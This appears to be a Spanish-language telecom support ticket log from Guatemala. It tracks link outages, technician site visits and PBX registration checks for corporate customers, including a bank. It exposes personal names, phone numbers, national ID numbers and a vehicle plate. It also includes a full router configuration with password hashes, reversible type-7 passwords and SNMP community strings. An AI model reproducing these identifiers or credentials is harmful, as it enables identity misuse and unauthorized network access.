    <t>SE ENVIA CORREO A CLIENTE CON LOS DATOS SOLICITADOS PARA QUE SE PUEDA LLEVAR A CABO LA INDUCCIÓN PARA REVISICÓN DEL SERVICIO
DE: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 13 DE MAYO DE 2022 10:05
PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; JOSE DANIEL TAROTT &lt;JOSE.TAROTT@SOMOSCMI.COM&gt;; CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; DAVID DEL VALLE &lt;DAVID.DELVALLE@SOMOSCMI.COM&gt;; WILDER ARNOLDO RICO LOPEZ &lt;WILDER.RICO@CLARO.COM.GT&gt;; FRANCISCO JAVIER ROSALES BURMESTER &lt;FRANCISCO.ROSALES@CLARO.COM.GT&gt;
ASUNTO: RE: F4560296 || 672200003T || RENACE 1 ALTA VERAPAZ
BUEN DÍA ESTIMADO CLIENTE, UN GUSTO SALUDARLE.
COMPARTIMOS LOS DATOS DE LOS TÉCNICOS SOLICITADOS PARA QUE SE PUEDA LLEVAR A CABO LA INDUCCIÓN Y ASÍ SE PUEDA LLEVAR A CABO LA REVISIÓN DEL SERVICIO
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS CORDIALES.
ATT</t>
  </si>
  <si>
    <t>*/*/*/*/CLIENTE ESCRIBE AUTORIZANDO VISITA TECNICA*/*/*/
DE: KANDY KRYSTINA CORONADO RAMON
ENVIADO EL: VIERNES, 13 DE MAYO DE 2022 14:54
PARA: JOSE DANIEL TAROTT &lt;JOSE.TAROTT@SOMOSCMI.COM&gt;; WILDER ARNOLDO RICO LOPEZ &lt;WILDER.RICO@CLARO.COM.GT&gt;; DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;; MAX BENITO CAAL CHIQUÍN &lt;MAX.CAAL@SOMOSCMI.COM&gt;; JORGE ALEXANDER PACAY RAMOS &lt;JORGE.PACAY@SOMOSCMI.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; DAVID DEL VALLE &lt;DAVID.DELVALLE@SOMOSCMI.COM&gt;; LUIS RAMAZZINI &lt;LUIS.RAMAZZINI@SOMOSCMI.COM&gt;; FRANCISCO JAVIER ROSALES BURMESTER &lt;FRANCISCO.ROSALES@CLARO.COM.GT&gt;
ASUNTO: RE: F4560296 || 672200003T || RENACE 1 ALTA VERAPAZ
BUENAS TARDES JOSÉ DANIEL,
            DANDO SEGUIMIENTO A SU CASO, HEMOS TRASLADADO LA INFORMACIÓN AL ÁREA CORRESPONDIENTE PARA PROCEDER, AL CONTAR CON AVANCES LE NOTIFICAREMOS.
CUALQUIER CONSULTA ESTAMOS A LA ORDEN.
---------------------------------------------------------------------------------------------
DE: JOSE DANIEL TAROTT [MAILTO:JOSE.TAROTT@SOMOSCMI.COM]
ENVIADO EL: VIERNES, 13 DE MAYO DE 2022 14:49
PARA: WILDER ARNOLDO RICO LOPEZ &lt;WILDER.RICO@CLARO.COM.GT&gt;; DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;; MAX BENITO CAAL CHIQUÍN &lt;MAX.CAAL@SOMOSCMI.COM&gt;; JORGE ALEXANDER PACAY RAMOS &lt;JORGE.PACAY@SOMOSCMI.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; DAVID DEL VALLE &lt;DAVID.DELVALLE@SOMOSCMI.COM&gt;; LUIS RAMAZZINI &lt;LUIS.RAMAZZINI@SOMOSCMI.COM&gt;; FRANCISCO JAVIER ROSALES BURMESTER &lt;FRANCISCO.ROSALES@CLARO.COM.GT&gt;
ASUNTO: RE: F4560296 || 672200003T || RENACE 1 ALTA VERAPAZ
BUEN DÍA ESTIMADOS,
LES INDICO QUE ES CORRECTO EL CURSO FUE APROBADO CON LO CUAL YA SE PUEDE PROGRAMAR LA VISITA PARA EL LUNES, EN HORARIO DE 8 A 5.
COPIO A LOS COMPAÑEROS @MAX BENITO CAAL CHIQUÍN Y @JORGE ALEXANDER PACAY RAMOS PARA QUE ESTÉN ENTERADOS Y PUEDAN ACOMPAÑAR LAS TAREAS.
SEGÚN PRUEBAS QUE SE HICIERON EL EQUIPO ESTA PRESENTANDO UNA FALLA YA QUE INHABILITA LOS EQUIPOS SW Y FW DE CMI AL MOMENTO DE CONECTARLO, POR LO QUE SUGIERO QUE LLEVEN OTRO PARA REEMPLAZARLO Y ANTES DE CONECTARLO NOTIFIQUEN.
QUEDO ATENTO A SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>SE ENIA CORREO AL CLIENTE CON LOS DATOS SOLICITADOS, A LA ESPERA DE RESPUESTA, CAPACITACION POR PARTE DE CLIENTE ESTA PROGRAMADO PARA EL DIA LUNES,
DE: JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 13 DE MAYO DE 2022 16:57
PARA: KANDY KRYSTINA CORONADO RAMON &lt;KANDY.CORONADO@CLARO.COM.GT&gt;; JOSE DANIEL TAROTT &lt;JOSE.TAROTT@SOMOSCMI.COM&gt;; WILDER ARNOLDO RICO LOPEZ &lt;WILDER.RICO@CLARO.COM.GT&gt;; DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;; MAX BENITO CAAL CHIQUÍN &lt;MAX.CAAL@SOMOSCMI.COM&gt;; JORGE ALEXANDER PACAY RAMOS &lt;JORGE.PACAY@SOMOSCMI.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; DAVID DEL VALLE &lt;DAVID.DELVALLE@SOMOSCMI.COM&gt;; LUIS RAMAZZINI &lt;LUIS.RAMAZZINI@SOMOSCMI.COM&gt;; FRANCISCO JAVIER ROSALES BURMESTER &lt;FRANCISCO.ROSALES@CLARO.COM.GT&gt;
ASUNTO: RE: F4560296 || 672200003T || RENACE 1 ALTA VERAPAZ
BUENA TARDE
ESTIMADO JOSÉ TAROTT DANDO SEGUIMIENTO AL INCIDENTE REPORTADO, Y DE ACUERDO A LO CONVERSADO VÍA TELEFÓNICA, SE LE COMPARTE DATOS DEL TÉCNICO Y VEHÍCULO.
NOMBRE. RICO LÓPEZ  WILDER ARNOLDO
DPI: 2239 52702 0401
DATOS DEL VEHÍCULO
PLACA: 996FRP
 1711 DOBLE CABINA COLOR BLANCO
QUEDAMOS ATENTOS A SUS COMENTARIOS
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSE TAROT 55194520 MENCIONA QUE YA TODO ESTA COORDINADO UNICAMENTE HACE FALTA EL DPI DE PERSONAL TECNICO Y EL NUMERO DE PLACA DE PLACA DEL CARRO
-ID 2001302371</t>
  </si>
  <si>
    <t>F4560313</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GIOVANNY HERNANDEZ 55987027 MENCIONA QUE ESTARA REALIZANDO PRUEBAS POR LO QUE SOLICITA LLAMADA A LAS  10:30 VALIDAR EL FUNCIONAMIENTO
-ID 1001923837</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  GIOVANNY HERNANDEZ 55987027 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001977207</t>
  </si>
  <si>
    <t>F4560367</t>
  </si>
  <si>
    <t>TECNICO EN NODO IDENTIFICANDO PATCHCORD DE FIBRA OPTICA POSIBLEMENTE DAÑADO</t>
  </si>
  <si>
    <t>EN LLAMADA CON TECNICO INDICA QUE SE REALIZA CAMBIO DE JUMOPER DE FIBRA EN NODO, ENLACE RESTABLECE SE PROCEDE A VALIDAR CON CLIENTE.</t>
  </si>
  <si>
    <t>CC_FUNDGENESIS_GT_ESQUIPULAS_022#SHO ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.72.202.17            1   8CFD.18AA.66BB  ARPA   GIGABITETHERNET0/0/0
INTERNET  10.72.202.20            -   10B3.D6D0.8B80  ARPA   GIGABITETHERNET0/0/0
INTERNET  10.87.138.145           6   8CFD.18AA.66BB  ARPA   GIGABITETHERNET0/0/1
INTERNET  10.87.138.148           -   10B3.D6D0.8B81  ARPA   GIGABITETHERNET0/0/1
INTERNET  170.15.12.1             -   10B3.D6D0.8BF4  ARPA   VLAN1
INTERNET  170.15.12.80            0   00E2.690C.64D1  ARPA   VLAN1
INTERNET  192.168.12.1            -   10B3.D6D0.8BF4  ARPA   VLAN1
INTERNET  192.168.12.2            2   C025.A501.E366  ARPA   VLAN1
INTERNET  192.168.12.3           26   3473.5ADC.80B5  ARPA   VLAN1
INTERNET  192.168.12.4           22   70B5.E8C0.E08F  ARPA   VLAN1
INTERNET  192.168.12.30           2   B445.064D.0E09  ARPA   VLAN1
INTERNET  192.168.12.110          0   F84D.FCE3.DB28  ARPA   VLAN1
INTERNET  192.168.12.115          0   C465.1645.EE72  ARPA   VLAN1
INTERNET  192.168.12.247          0   001A.E838.7320  ARPA   VLAN1
INTERNET  192.168.12.248          0   001A.E835.2C97  ARPA   VLAN1
INTERNET  192.168.12.249         20   001A.E8A3.3DC4  ARPA   VLAN1
INTERNET  192.168.12.250          9   9418.82BF.C960  ARPA   VLAN1
CC_FUNDGENESIS_GT_ESQUIPULAS_022#SHO INTE
CC_FUNDGENESIS_GT_ESQUIPULAS_022#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42000        13     20000        13         0
* GIGABITETHERNET0/0/1          0         0         0      2167         0         0         0         0         0
  GIGABITETHERNET0/1/0          0         0         0         0         0         0         0         0         0
  GIGABITETHERNET0/1/1          0         0         0         0         0         0         0         0         0
  GIGABITETHERNET0/1/2          0         0         0         0         0         0         0         0         0
* GIGABITETHERNET0/1/3          0         0         0         0     17000        12     59000        10         0
* LOOPBACK5                     0         0         0         0         0         0         0         0         0
* VLAN1                         0         0         0    160883     21000        13     61000        10         0
CC_FUNDGENESIS_GT_ESQUIPULAS_022#SHO IP AR
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.72.202.17            1   8CFD.18AA.66BB  ARPA   GIGABITETHERNET0/0/0
INTERNET  10.72.202.20            -   10B3.D6D0.8B80  ARPA   GIGABITETHERNET0/0/0
INTERNET  10.87.138.145           6   8CFD.18AA.66BB  ARPA   GIGABITETHERNET0/0/1
INTERNET  10.87.138.148           -   10B3.D6D0.8B81  ARPA   GIGABITETHERNET0/0/1
INTERNET  170.15.12.1             -   10B3.D6D0.8BF4  ARPA   VLAN1
INTERNET  170.15.12.80            0   00E2.690C.64D1  ARPA   VLAN1
INTERNET  192.168.12.1            -   10B3.D6D0.8BF4  ARPA   VLAN1
INTERNET  192.168.12.2            2   C025.A501.E366  ARPA   VLAN1
INTERNET  192.168.12.3           26   3473.5ADC.80B5  ARPA   VLAN1
INTERNET  192.168.12.4           23   70B5.E8C0.E08F  ARPA   VLAN1
INTERNET  192.168.12.30           2   B445.064D.0E09  ARPA   VLAN1
INTERNET  192.168.12.110          0   F84D.FCE3.DB28  ARPA   VLAN1
INTERNET  192.168.12.115          0   C465.1645.EE72  ARPA   VLAN1
INTERNET  192.168.12.247          0   001A.E838.7320  ARPA   VLAN1
INTERNET  192.168.12.248          0   001A.E835.2C97  ARPA   VLAN1
INTERNET  192.168.12.249         20   001A.E8A3.3DC4  ARPA   VLAN1
INTERNET  192.168.12.250          9   9418.82BF.C960  ARPA   VLAN1
CC_FUNDGENESIS_GT_ESQUIPULAS_022#SHO INTE DES
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
GI0/0/0                        UP             UP       WAN PRINCIPAL/_/245700102T/_/
GI0/0/1                        UP             UP       WAN REDUNDANTE/_/245700179T/_/
GI0/1/0                        DOWN           DOWN
GI0/1/1                        DOWN           DOWN
GI0/1/2                        DOWN           DOWN
GI0/1/3                        UP             UP
LO5                            UP             UP       MONITOREO DEL CNOC
VL1                            UP             UP       LAN DEL CLIENTE
CC_FUNDGENESIS_GT_ESQUIPULAS_022#SHO RUN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 9632 BYTES
!
! LAST CONFIGURATION CHANGE AT 14:55:35 GUA WED FEB 16 2022
!
VERSION 16.10
SERVICE TIMESTAMPS DEBUG DATETIME MSEC
SERVICE TIMESTAMPS LOG DATETIME MSEC
SERVICE PASSWORD-ENCRYPTION
SERVICE CALL-HOME
PLATFORM QFP UTILIZATION MONITOR LOAD 80
NO PLATFORM PUNT-KEEPALIVE DISABLE-KERNEL-CORE
!
HOSTNAME CC_FUNDGENESIS_GT_ESQUIPULAS_022
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 9 $9$2Y73ANLBV1NUDE$QW14UIMPIPX4RAM86XYDSMLTAJGOPGZ265D/52CUCKY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NO IP DOMAIN LOOKUP
!
!
!
LOGIN ON-SUCCESS LOG
!
!
!
!
!
!
!
SUBSCRIBER TEMPLATING
MULTILINK BUNDLE-NAME AUTHENTICATED
!
!
!
CRYPTO PKI TRUSTPOINT TP-SELF-SIGNED-3961012653
 ENROLLMENT SELFSIGNED
 SUBJECT-NAME CN=IOS-SELF-SIGNED-CERTIFICATE-3961012653
 REVOCATION-CHECK NONE
 RSAKEYPAIR TP-SELF-SIGNED-3961012653
!
CRYPTO PKI TRUSTPOINT SLA-TRUSTPOINT
 ENROLLMENT PKCS12
 REVOCATION-CHECK CRL
!
!
CRYPTO PKI CERTIFICATE CHAIN TP-SELF-SIGNED-3961012653
 CERTIFICATE SELF-SIGNED 01
  30820330 30820218 A0030201 02020101 300D0609 2A864886 F70D0101 05050030
  31312F30 2D060355 04031326 494F532D 53656C66 2D536967 6E65642D 43657274
  69666963 6174652D 33393631 30313236 3533301E 170D3230 30343330 30333231
  32395A17 0D333030 31303130 30303030 305A3031 312F302D 06035504 03132649
  4F532D53 656C662D 5369676E 65642D43 65727469 66696361 74652D33 39363130
  31323635 33308201 22300D06 092A8648 86F70D01 01010500 0382010F 00308201
  0A028201 0100A343 8D67C4C8 942A8506 EF03FA6F BFEA0E68 80707EE1 F071E833
  C281F386 B35C8A0F D132E2E4 F22520A2 A2BDAEEC A0E3BC3C 4E0555D4 070DA37C
  ED52ABEB 070AC112 149B607D 203959EB 09185B52 3CD87472 4B9AA62E F0250302
  BF553D31 34854678 F891FD3F 55F2F031 6C3490FB BCD68ED0 2E507C16 7DD8482E
  F0E39CFA 73A48EBC 3AF01865 56786AE7 9C06149C CED2E1BF CCF91EA6 6A711391
  B812B30D A0B2617D 6CFAFE40 5DE76B34 E0CC9555 C0901E8F DB04C4C2 E5AE2AE6
  ED8DF612 8C871300 1AB97F81 CC4AF50F 5162F3C5 94EBF87F 4401F901 50885823
  91044201 8BD1D4F5 3B62C5C8 588FB078 6258A048 73D30EEA 5A116079 9E65C564
  559B2863 946D0203 010001A3 53305130 0F060355 1D130101 FF040530 030101FF
  301F0603 551D2304 18301680 14468E62 BA44EF45 F0716AB4 54E516EF 4425645C
  B8301D06 03551D0E 04160414 468E62BA 44EF45F0 716AB454 E516EF44 25645CB8
  300D0609 2A864886 F70D0101 05050003 82010100 6AEE9FFD 3E3EB041 FD555A73
  C520EACA D8F0A7FF 20C35834 A3DBD53D BF04C76F B2CB90C6 9E635D1C ADDCBA34
  3CCCF7C3 35E43D73 A57F81CF 81E3E48B 2DC62C6E 888252E1 95495A4D 75ECFA7C
  4BEFF69D 07E12807 8CF128E6 F6BAABEA 919C1273 CB6A25E6 56790EB6 891DD3DB
  A01EE129 EB7A8F73 1E0DB1D7 E2300F47 FCADBBFD 18B0BC4F E99AA0CE DB8F4D50
  2D511F5F 670DA41C B122AEE6 149922C1 9B733014 E7A88CD3 ECDFC1A9 2435F916
  9FACEBBE 1D05AB8A 526AE74E 95333901 C39F3BE2 4FE1CBD6 7BA49DD6 CC5537EF
  86C69DBA 31A971DF 6B35EF60 05083E5A EB29EAF9 11ED03DB F698004B BEFE9B6D
  59A45D0D 8EC67A40 3FC6DC72 C32D1BF2 D0503048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3310LN
!
DIAGNOSTIC BOOTUP LEVEL MINIMAL
!
SPANNING-TREE EXTEND SYSTEM-ID
!
!
USERNAME GESTIONIP SECRET 9 $9$LVM9E1TN10HM2K$SQCDQS85R7UUORNO3663QNT5QBW78FKBVTMSTSRVDNS
!
REDUNDANCY
 MODE NONE
!
!
VLAN INTERNAL ALLOCATION POLICY ASCENDING
!
!
CLASS-MAP MATCH-ANY H323-SIGN
 MATCH IP DSCP AF31
CLASS-MAP MATCH-ANY LLQ
 MATCH IP DSCP EF
CLASS-MAP MATCH-ANY RTP
 MATCH PROTOCOL RTP AUDIO
 MATCH ACCESS-GROUP 102
 MATCH ACCESS-GROUP 110
CLASS-MAP MATCH-ANY SIGNALING
 MATCH ACCESS-GROUP 101
CLASS-MAP MATCH-ALL DEFAULT
!
POLICY-MAP CB
 CLASS LLQ
  PRIORITY PERCENT 45
 CLASS H323-SIGN
  BANDWIDTH PERCENT 5
 CLASS CLASS-DEFAULT
  FAIR-QUEUE
POLICY-MAP CB2
 CLASS CLASS-DEFAULT
  SHAPE AVERAGE PERCENT 100
   SERVICE-POLICY CB
POLICY-MAP SERVICIOS_15MB
 CLASS CLASS-DEFAULT
  POLICE CIR 15360000 BC 2880000 BE 2880000
   CONFORM-ACTION TRANSMIT
   EXCEED-ACTION DROP
   VIOLATE-ACTION DROP
POLICY-MAP MARK
 CLASS SIGNALING
  SET DSCP AF31
 CLASS RTP
  SET DSCP EF
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.100.78 255.255.255.255
!
INTERFACE GIGABITETHERNET0/0/0
 DESCRIPTION WAN PRINCIPAL/_/245700102T/_/
 BANDWIDTH 15360
 IP ADDRESS 10.72.202.20 255.255.255.248
 IP NBAR PROTOCOL-DISCOVERY
 IP OSPF NETWORK POINT-TO-MULTIPOINT NON-BROADCAST
 IP OSPF DEAD-INTERVAL 60
 IP OSPF MTU-IGNORE
 LOAD-INTERVAL 30
 NEGOTIATION AUTO
!
INTERFACE GIGABITETHERNET0/0/1
 DESCRIPTION WAN REDUNDANTE/_/245700179T/_/
 BANDWIDTH 2048
 IP ADDRESS 10.87.138.148 255.255.255.240
 IP NBAR PROTOCOL-DISCOVERY
 LOAD-INTERVAL 30
 NEGOTIATION AUTO
 SERVICE-POLICY OUTPUT CB
!
INTERFACE GIGABITETHERNET0/1/0
!
INTERFACE GIGABITETHERNET0/1/1
!
INTERFACE GIGABITETHERNET0/1/2
!
INTERFACE GIGABITETHERNET0/1/3
!
INTERFACE VLAN1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 170.15.12.1 255.255.255.0 SECONDARY
 IP ADDRESS 192.168.12.1 255.255.255.0
 IP NBAR PROTOCOL-DISCOVERY
 SERVICE-POLICY INPUT SERVICIOS_15MB
 SERVICE-POLICY OUTPUT SERVICIOS_15MB
!
ROUTER OSPF 1
 ROUTER-ID 10.72.202.20
 AREA 304 NSSA
 REDISTRIBUTE CONNECTED ROUTE-MAP CONNECTED
 NETWORK 10.72.202.16 0.0.0.7 AREA 304
 NEIGHBOR 10.72.202.17
!
IP FORWARD-PROTOCOL ND
IP HTTP SERVER
IP HTTP AUTHENTICATION LOCAL
IP HTTP SECURE-SERVER
IP ROUTE 0.0.0.0 0.0.0.0 10.87.138.145 200 NAME RESPALDO
!
!
!
IP PREFIX-LIST CONNECTED SEQ 5 PERMIT 10.212.100.78/32
IP PREFIX-LIST CONNECTED SEQ 10 PERMIT 192.168.12.0/24
IP PREFIX-LIST CONNECTED SEQ 15 PERMIT 170.15.12.0/24
LOGGING SOURCE-INTERFACE LOOPBACK5
ACCESS-LIST 88 REMARK MONITOREO DE CLARO
ACCESS-LIST 88 PERMIT 10.255.24.144 0.0.0.7
ACCESS-LIST 88 PERMIT 190.148.15.192 0.0.0.15
ACCESS-LIST 101 REMARK VOIP_SIGN
ACCESS-LIST 101 PERMIT TCP ANY ANY RANGE 2000 2002
ACCESS-LIST 101 PERMIT TCP ANY ANY EQ 1720
ACCESS-LIST 101 PERMIT TCP ANY ANY RANGE 11000 11999
ACCESS-LIST 101 PERMIT UDP ANY ANY EQ 2427
ACCESS-LIST 101 PERMIT TCP ANY ANY EQ 2428
ACCESS-LIST 101 PERMIT UDP ANY ANY EQ 1719
ACCESS-LIST 101 PERMIT UDP ANY ANY EQ 5060
ACCESS-LIST 102 REMARK VOIP_RTP
ACCESS-LIST 102 PERMIT UDP ANY ANY RANGE 16384 32767
ACCESS-LIST 110 REMARK CLIENTES_VOIP
ACCESS-LIST 110 PERMIT IP ANY HOST 192.168.12.246
ACCESS-LIST 110 PERMIT IP ANY HOST 192.168.12.247
ACCESS-LIST 110 PERMIT IP ANY HOST 192.168.12.248
!
!
ROUTE-MAP CONNECTED PERMIT 10
 MATCH IP ADDRESS PREFIX-LIST CONNECTEDROUTE-MAP CONNECTED PERMIT 10
!
SNMP-SERVER COMMUNITY MON002457D RO
SNMP-SERVER COMMUNITY GENESIS RO
SNMP-SERVER COMMUNITY MON000089D RO
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION 7A. CALLE 3-39 ZONA 1, ESQUIPULAS
!
!
CONTROL-PLANE
!
BANNER MOTD ^CCC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7 15060E00033F2A
 TRANSPORT INPUT NONE
 STOPBITS 1
LINE VTY 0 4
 PASSWORD 7 1311121E0C1905
 LOGIN LOCAL
 TRANSPORT INPUT ALL
!
!
!
!
!
!
END
CC_FUNDGENESIS_GT_ESQUIPULAS_022#</t>
  </si>
  <si>
    <t>SE ENVIA CORREO
JOSE ANTONIO FERNANDEZ CABRERA
JUE 12/05/2022 09:05
BUEN DÍA
ESTIMADO CLIENTE, POR ESTE MEDIO SOLICITO SU APOYO, PARA LA GESTIÓN DE PERMISOS NECESARIOS   PARA PERSONAL TÉCNICO CON RESPECTO AL ENLACE CON ID:IP2107001SV//GENERADORA ELECTRICA/NUEVO CUSCATLANKM 12.5DESVIO A HUIZUCAR/UT/F4560415 ADJUNTO DATOS DE PERSONAL TÉCNICO Y PODER VALIDAR EL ACCESO POR ESTA MISMA VIA EN EL HORARIO QUE USTED NOS INDIQUE.
00936126-7 4799 MARIO ERNESTO CRUZ MARQUEZ
00354722-1 4378 RONAL MOREL CRESPIN
00157708-4 4690 ABRAHAM SAMUEL PEREZ
00580847-9 2181 CARLOS EDUARDO GOMEZ ZELEDON
02878871-1 2437 JOSE ALFREDO JIMENEZ
03245714-4 8787 ADAN ERNESTO GONZALEZ
01101266-2 4605 JOSE SALVADOR PORTILLO VELASQUEZ
QUEDO A LA ESPERA DE SUS COMENTARIOS
SALUDOS CORDIALES.
ATT
JOSE ANTONIO FERNANDEZ CABRERA</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOHANNA MONTAYA 22636999 RESPONDE SEÑORITA (NO BRINDA NOMBRE) MENCIONA QUE LOS PERMISOS YA ESTAN AUTORIZADOS, SE NOTIFICARA A GESTOR PARA EL SEGUIMIENTO
-ID 1001922520</t>
  </si>
  <si>
    <t>F4560456</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ARNOLD CABALLERO 31850297 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001099284 - 2001099755</t>
  </si>
  <si>
    <t>F4560461</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LEONOR HENRIQUEZ 77973768 Y 21036039 CLIENTE NO RESPONDE, SE INTENTARA LUEGO **
ID 1001912725 - 1001912772
**</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE YA APLICO REINICIO DE LA PBX Y EL EQUIPO ASMI SIN EMBARGO EL SERVICIO NO RESTABLECE, SE LE SOLICITA AL CLIENTE QUE UBIQUE EQUIPO ASMI PARA VALIDAR SI TIENE ALGUNA ALARMA CLIENTE INDICA QUE NO PUEDE APOYARNOS EN ESTE MOMENTO YA QUE TIENE AL PERSONAL DE LA PBX REVISANDO EN SITIO.
SOLICITA QUE SE ENVIE PERSONAL TECNICO DE PARTE DE CLARO PARA REALIZAR PRUEBAS Y VERIFICAR LOS EQUIPOS
INDICA QUE NO ES NECESARIO TRAMITAR PERMISOS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE JUAN GABRIEL 57694649
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMA AL GDN INGRESA LA LLAMADA SIN PROBLEMAS, NOS ATIENDE JUAN GABRIEL QUIEN CONFIRMA SERVICIO RESTABLECIDO, SE PROCEDE CON EL CIERRE DE CASO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE  OSCAR TORRES NOS COMENTA QUE ESTA PIDIENDO APOOYO PARA VERIFICAR SU PBX- ##PIDE SE LE MARQUE EN 40 MINUTOS ##</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE OSCAR TORRES QUIEN SOLICITA VISITA TECNICA PARA EL DIA DE MAÑANA A LAS 9:00AM INDICA QUE SI POSEE LAS CREDENCIALES.
SE APERTURA WO PARA LA ASIGNACION DE PERSONAL.
2001086154, 2001086623,
COLA:
NOMBRE: A: 58656684
NÚMERO: 58656684
DURACIÓN: 0:00:47
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 58656684
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 12/05/2022 16:27:23</t>
  </si>
  <si>
    <t>SE ENVIO CORREO AL CLIENTE PARA EL DIA DE MAÑANA
DE: HUGO JOSE SOTO SAMAYOA &lt;HUGO.SOTO@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 12 DE MAYO DE 2022 16:44
PARA: OTORRES@INTERBANCO.COM.GT &lt;OTORRES@INTERBANCO.COM.GT&gt;; CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;
ASUNTO: SD1124885 BANCO INTERNACIONAL AGENCIA TERMINAL
BUENAS TARDES
ESTIMADO POR ESTE MEDIO SOLICITO EL INGRESO A SUS INSTALACIONES PARA EL DIA 13/05/22 A PARTIR DE LAS 9:00AM.
PARA REVISION DEL LA LINEA SIPTRUNK.
MARLON ENRIQUE MUÑOZ ORELLANA         DPI 1582465001801
JOSÉ ALBERTO IXPATA TOJ                                DPI 1660023131503
QUEDO A LA ESPERA DEL CORREO DE LA AUTORIZACION.
SALUDOS.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE OSCAR TORRES-58656684  ##VIVO ##CABLE DE PBX
##SE OBSERVA PBX CONECTADA-
BANCO_INTERNACIONAL# SHOW CONFIGURE PORT SUMMARY
PORT           NUMBER         NAME            ADMIN    OPER      SPEED
-----------------------------------------------------------------------------
ETHERNET       1              ETH-1           UP       UP        100000000
ETHERNET       2              ETH-2           DOWN     DOWN      100000000
ETHERNET       3              ETH-3           UP       UP        100000000
ETHERNET       4              ETH-4           DOWN     DOWN      100000000
ETHERNET       5              ETH-5           DOWN     DOWN      100000000
ETHERNET       6              ETH-6           DOWN     DOWN      100000000
ETHERNET       101            MNG-ETH         UP       DOWN      100000000
BANCO_INTERNACIONAL#
PBX NO SE REGISTRA-
XP USRINF:ENTITYPE=SCSCF,IMPU="TEL:+50222164650";
GNCYGTAJ_CENTRO_CSCF
+++    CSCF/*MEID:5 MENAME:GNCYGTAJ_CENTRO_CSCF*/        2022-05-12 12:27:56-06:00
O&amp;M    #247436
%%/*1879542683 MEID=005*/EXP USRINF: ENTITYPE=SCSCF,IMPU="TEL:+50222164650";%%
RETCODE = 0  OPERATION SUCCEEDED
THE RESULT IS AS FOLLOWS:
-------------------------
               IMPI  =  +50222164650@IMSHWI.CLARO.COM.GT
               IMPU  =  TEL:+50222164650
         SCU NUMBER  =  110
     REGISTER STATE  =  UNREGISTERED
      REGISTER TIME  =  3600
      RESIDUAL TIME  =  865
        PATH HEADER  =  NULL
    CONTACT ADDRESS  =  NULL
 AUTHORIZATION TYPE  =  NULL
  USER SUBSCRIBE ID  =  NULL
    USER SESSION ID  =  NULL
         USER AGENT  =  NULL
USER PRIORITY LEVEL  =  0
        IFC UNSAVED  =  NO
  P-CSCF NETWORK ID  =  NULL
(NUMBER OF RESULTS = 1)
---    END</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE
CASO: SD1124885 ///CLIENTE: BANCO INTERNACIONAL, S.A. ///GDN: 22164650
¿
ESVIN ANTONIO PAREDES SAMUY
JUE 12/05/2022 15:38
